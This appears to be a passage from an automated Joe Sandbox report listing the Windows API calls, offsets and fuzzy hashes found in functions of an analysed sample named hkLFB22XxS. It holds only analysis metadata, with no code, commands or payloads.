                                                            • Opcode Fuzzy Hash: 4d16260d770fda5a1d0bcc7ece62e4daadf03db58bee686193d3cb906cc030c5
                                                            • Instruction Fuzzy Hash: CB218E71200209BBEF116E64EC80EBB37ADFB69368F184629FA11D2190E771CC619760
                                                            APIs
                                                            • GetStdHandle.KERNEL32(0000000C), ref: 0087705E
                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00877091
                                                            • GetStdHandle.KERNEL32(0000000C), ref: 008770A3
                                                            • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 008770DD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: CreateHandle$FilePipe
                                                            • String ID: nul
                                                            • API String ID: 4209266947-2873401336
                                                            • Opcode ID: f312a1af4666083dc8b0685b93e71b144c6f02d65fbec1225dff6d1c3c70c7c1
                                                            • Instruction ID: 9fd0e2ade2ca64baa377737c6fd24758656857814f4a0392c8b8d6774354999e
                                                            • Opcode Fuzzy Hash: f312a1af4666083dc8b0685b93e71b144c6f02d65fbec1225dff6d1c3c70c7c1
                                                            • Instruction Fuzzy Hash: AB219F74604609ABDF209F38DC04A9A77A8FF54724F24861AF9A4D72D4E771D850CB50
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 0087712B
                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0087715D
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 0087716E
                                                            • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 008771A8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: CreateHandle$FilePipe
                                                            • String ID: nul
                                                            • API String ID: 4209266947-2873401336
                                                            • Opcode ID: f0b96f6a6d307d167761046bca61c5c95eaec85a8e7ae3b5997cc1a65dff381c
                                                            • Instruction ID: 56efdd18f3e03da1aa51f17125ad230a20f023cc412dfc74c2371b81b35cdac5
                                                            • Opcode Fuzzy Hash: f0b96f6a6d307d167761046bca61c5c95eaec85a8e7ae3b5997cc1a65dff381c
                                                            • Instruction Fuzzy Hash: B021C1715042099BDF209F689C04AAAB7A8FF55324F60861AFDB8D32D4EB70D851CB61
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0087AEBF
                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0087AF13
                                                            • __swprintf.LIBCMT ref: 0087AF2C
                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000,0089F910), ref: 0087AF6A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$InformationVolume__swprintf
                                                            • String ID: %lu
                                                            • API String ID: 3164766367-685833217
                                                            • Opcode ID: 9aa9aa2bac5292701b277ea1e6a1b346b0a4eb4c52ff12d6ba00d8b9464350f1
                                                            • Instruction ID: 9210fa0c1eae635aacfe60349975046c25ee9ae7bd1458e19e41fe84c7fc791c
                                                            • Opcode Fuzzy Hash: 9aa9aa2bac5292701b277ea1e6a1b346b0a4eb4c52ff12d6ba00d8b9464350f1
                                                            • Instruction Fuzzy Hash: 42214430600119AFCB14EF58CD85DEE7BB8FF89714B144069F949EB252DB71EA41CB62
                                                            APIs
                                                              • Part of subcall function 00817D2C: _memmove.LIBCMT ref: 00817D66
                                                              • Part of subcall function 0086A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0086A399
                                                              • Part of subcall function 0086A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0086A3AC
                                                              • Part of subcall function 0086A37C: GetCurrentThreadId.KERNEL32 ref: 0086A3B3
                                                              • Part of subcall function 0086A37C: AttachThreadInput.USER32(00000000), ref: 0086A3BA
                                                            • GetFocus.USER32 ref: 0086A554
                                                              • Part of subcall function 0086A3C5: GetParent.USER32(?), ref: 0086A3D3
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 0086A59D
                                                            • EnumChildWindows.USER32(?,0086A615), ref: 0086A5C5
                                                            • __swprintf.LIBCMT ref: 0086A5DF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                            • String ID: %s%d
                                                            • API String ID: 1941087503-1110647743
                                                            • Opcode ID: 182278c130749036a921245f3c310154bf7f6fbf573ebb68330bd63a6edbf936
                                                            • Instruction ID: 5ee8549ccfda27a90dbc1ec6b7947ec5cc59c687ffa44b71bb7888494cfcc02a
                                                            • Opcode Fuzzy Hash: 182278c130749036a921245f3c310154bf7f6fbf573ebb68330bd63a6edbf936
                                                            • Instruction Fuzzy Hash: CC1190712002086BDF157FA8ED85FEA777CFF48704F044079BA18EA252CA7499458B76
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?), ref: 00872048
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                            • API String ID: 3964851224-769500911
                                                            • Opcode ID: 1f6a59968bef247e7c72ba54edd17769c1de40484eb90d805b6a0334dce9beb2
                                                            • Instruction ID: 7fa32a819df2f49cbe33577e66f43487bac893720e00901aa3b6aad202c8955c
                                                            • Opcode Fuzzy Hash: 1f6a59968bef247e7c72ba54edd17769c1de40484eb90d805b6a0334dce9beb2
                                                            • Instruction Fuzzy Hash: 12115B7490010DCFCF04EFA8D8519EEB7B8FF65308F148569D896E7256EB32A90ACB51
                                                            APIs
                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0088EF1B
                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0088EF4B
                                                            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0088F07E
                                                            • CloseHandle.KERNEL32(?), ref: 0088F0FF
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                            • String ID:
                                                            • API String ID: 2364364464-0
                                                            • Opcode ID: d9da52839848809fa6b356f2103904c206c16cd2f147edcaba51cb7da4bc167e
                                                            • Instruction ID: 726241fc026f092458100cb90cbb92dfe83b9c482092c65b803bc91d26fe70df
                                                            • Opcode Fuzzy Hash: d9da52839848809fa6b356f2103904c206c16cd2f147edcaba51cb7da4bc167e
                                                            • Instruction Fuzzy Hash: 288152716047119FD720EF28C856F6AB7E9FF88710F14881DF699DB292DB70AC448B92
                                                            APIs
                                                              • Part of subcall function 00817F41: _memmove.LIBCMT ref: 00817F82
                                                              • Part of subcall function 008910A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00890038,?,?), ref: 008910BC
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00890388
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008903C7
                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0089040E
                                                            • RegCloseKey.ADVAPI32(?,?), ref: 0089043A
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00890447
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                            • String ID:
                                                            • API String ID: 3440857362-0
                                                            • Opcode ID: e9cf8fae18026fe22bf7f1a696a09865cb8abf70e69c06dfd98d7ea18ce8251a
                                                            • Instruction ID: 58b8a2d65dcb419743abbdceb403c1efc4985cb3969e9b61a0637820dec97c4c
                                                            • Opcode Fuzzy Hash: e9cf8fae18026fe22bf7f1a696a09865cb8abf70e69c06dfd98d7ea18ce8251a
                                                            • Instruction Fuzzy Hash: EC514B31208205AFDB04EB58D881EAEB7E8FF84708F08892DF595C7292DB30E944DB52
                                                            APIs
                                                              • Part of subcall function 00819997: __itow.LIBCMT ref: 008199C2
                                                              • Part of subcall function 00819997: __swprintf.LIBCMT ref: 00819A0C
                                                            • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0088DC3B
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0088DCBE
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0088DCDA
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0088DD1B
                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0088DD35
                                                              • Part of subcall function 00815B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00877B20,?,?,00000000), ref: 00815B8C
                                                              • Part of subcall function 00815B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00877B20,?,?,00000000,?,?), ref: 00815BB0
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 327935632-0
                                                            • Opcode ID: 35fa42cde3af2999441091812c8b522567693a433fa6e2e889f118d1d42391bd
                                                            • Instruction ID: 52b4a4cc37cf0c2e255bcfb314469278d84a3a9795a619c8cc9c0a656564d8f0
                                                            • Opcode Fuzzy Hash: 35fa42cde3af2999441091812c8b522567693a433fa6e2e889f118d1d42391bd
                                                            • Instruction Fuzzy Hash: 79511775A00209DFCB04EFA8C4949ADB7F9FF58310B148069E959EB362DB34ED85CB91
                                                            APIs
                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0087E88A
                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0087E8B3
                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0087E8F2
                                                              • Part of subcall function 00819997: __itow.LIBCMT ref: 008199C2
                                                              • Part of subcall function 00819997: __swprintf.LIBCMT ref: 00819A0C
                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0087E917
                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0087E91F
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 1389676194-0
                                                            • Opcode ID: a5bd20868ed4fbf3c230768f366e67477b645fa9db00800e7b8739b883d2a589
                                                            • Instruction ID: abc84ba0d4e0498e467476ed93743b0fec3e57c2f7d6524c3039686765dd4945
                                                            • Opcode Fuzzy Hash: a5bd20868ed4fbf3c230768f366e67477b645fa9db00800e7b8739b883d2a589
                                                            • Instruction Fuzzy Hash: 11511C75A00205DFCB05EF68C991AADBBF5FF48314B1480A9E949EB362CB31ED51CB51
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2f4756cabc0019121dd8d46244f346b97355b38ebaf2eb146029427881e65e0d
                                                            • Instruction ID: 5dfcbbba3dfa5597871f831bb44031d8066236504557b1589570089f0ff1b7aa
                                                            • Opcode Fuzzy Hash: 2f4756cabc0019121dd8d46244f346b97355b38ebaf2eb146029427881e65e0d
                                                            • Instruction Fuzzy Hash: 0141D535A00108AFDB18FF28CC44BA9BBA4FB09310F1D4165F955E72D1D770AD51EA91
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 00812357
                                                            • ScreenToClient.USER32(008D67B0,?), ref: 00812374
                                                            • GetAsyncKeyState.USER32(00000001), ref: 00812399
                                                            • GetAsyncKeyState.USER32(00000002), ref: 008123A7
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: AsyncState$ClientCursorScreen
                                                            • String ID:
                                                            • API String ID: 4210589936-0
                                                            • Opcode ID: 2cefc44173ad15d1a1d858e83ab0eee33d70609458ddb7caf7a8ef03dcd351c7
                                                            • Instruction ID: a18cf1f1ae1a103723903ff61d7f9d034a8fc4f6b9d95f1ccf78bc8609c34943
                                                            • Opcode Fuzzy Hash: 2cefc44173ad15d1a1d858e83ab0eee33d70609458ddb7caf7a8ef03dcd351c7
                                                            • Instruction Fuzzy Hash: 76416E71504119FBDF199F68C844AE9BB78FF05364F20431AF838D22A0C77459A0DBA1
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0086695D
                                                            • TranslateAcceleratorW.USER32(?,?,?), ref: 008669A9
                                                            • TranslateMessage.USER32(?), ref: 008669D2
                                                            • DispatchMessageW.USER32(?), ref: 008669DC
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008669EB
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                            • String ID:
                                                            • API String ID: 2108273632-0
                                                            • Opcode ID: 579309f614802b53944a9e3ceeec2b433b1571c8ceec1cbdec16ca9c92e4057b
                                                            • Instruction ID: 1f0bb6da07598d6362b92c9bed6958eb1e6b4abb63451c036752b67031c38f89
                                                            • Opcode Fuzzy Hash: 579309f614802b53944a9e3ceeec2b433b1571c8ceec1cbdec16ca9c92e4057b
                                                            • Instruction Fuzzy Hash: 2A31C23190129AAADB24DFB4DC44FB67BACFB11314F194266E821D21A1F73498B5DBA0
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 00868F12
                                                            • PostMessageW.USER32(?,00000201,00000001), ref: 00868FBC
                                                            • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00868FC4
                                                            • PostMessageW.USER32(?,00000202,00000000), ref: 00868FD2
                                                            • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00868FDA
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: MessagePostSleep$RectWindow
                                                            • String ID:
                                                            • API String ID: 3382505437-0
                                                            • Opcode ID: fea7cd2bc4158c83f6ecc2ea1d68d945b0511fb6c77163d2084945739932c3d1
                                                            • Instruction ID: 9c374de729f06bb2911e8a7636a41c7e67e7c904f9bfd0904ef03b0ceae6f73f
                                                            • Opcode Fuzzy Hash: fea7cd2bc4158c83f6ecc2ea1d68d945b0511fb6c77163d2084945739932c3d1
                                                            • Instruction Fuzzy Hash: 4A31EE71500219EFDF14CFA8D94CA9E7BB6FB04315F114229FA28EA1D1CBB09950CB90
                                                            APIs
                                                            • IsWindowVisible.USER32(?), ref: 0086B6C7
                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0086B6E4
                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0086B71C
                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0086B742
                                                            • _wcsstr.LIBCMT ref: 0086B74C
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                            • String ID:
                                                            • API String ID: 3902887630-0
                                                            • Opcode ID: 87b4644b9f69aaf851642f43b5b1078d276faca235e36bc478c140181fd4896b
                                                            • Instruction ID: fcbd73cd1c9e0c608861f5d18ea9890837b2afe80b32f74a1127c261c8149708
                                                            • Opcode Fuzzy Hash: 87b4644b9f69aaf851642f43b5b1078d276faca235e36bc478c140181fd4896b
                                                            • Instruction Fuzzy Hash: 3F21F931204244BBEB295B79DC49E7B7BACFF95724F05403AFD05CA1A2EF61DC8096A1
                                                            APIs
                                                              • Part of subcall function 00812612: GetWindowLongW.USER32(?,000000EB), ref: 00812623
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0089B44C
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0089B471
                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0089B489
                                                            • GetSystemMetrics.USER32(00000004), ref: 0089B4B2
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00881184,00000000), ref: 0089B4D0
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Window$Long$MetricsSystem
                                                            • String ID:
                                                            • API String ID: 2294984445-0
                                                            • Opcode ID: 834fec6140089f012f5fb772eb1a3da1797ddca1ae57a22b1d697022f2d880e6
                                                            • Instruction ID: 0d55c4fcf07c28bc07ecc72c60cde255c19199c333ac3df7093206cd0ca5b6d4
                                                            • Opcode Fuzzy Hash: 834fec6140089f012f5fb772eb1a3da1797ddca1ae57a22b1d697022f2d880e6
                                                            • Instruction Fuzzy Hash: 3421B571610255AFCF14AF38ED04A6A37A4FB05724F194739F926D71E2E7309C20EB84
                                                            APIs
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00869802
                                                              • Part of subcall function 00817D2C: _memmove.LIBCMT ref: 00817D66
                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00869834
                                                            • __itow.LIBCMT ref: 0086984C
                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00869874
                                                            • __itow.LIBCMT ref: 00869885
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$__itow$_memmove
                                                            • String ID:
                                                            • API String ID: 2983881199-0
                                                            • Opcode ID: d775f05838d3da0e35f1e32e63aa5e60527b238d5043bd8583d90f87d96ed22f
                                                            • Instruction ID: 9733955dc1ec171e5a5d40024bd4d7f39b49feb60a7ab0b084cdda9a1c0c7851
                                                            • Opcode Fuzzy Hash: d775f05838d3da0e35f1e32e63aa5e60527b238d5043bd8583d90f87d96ed22f
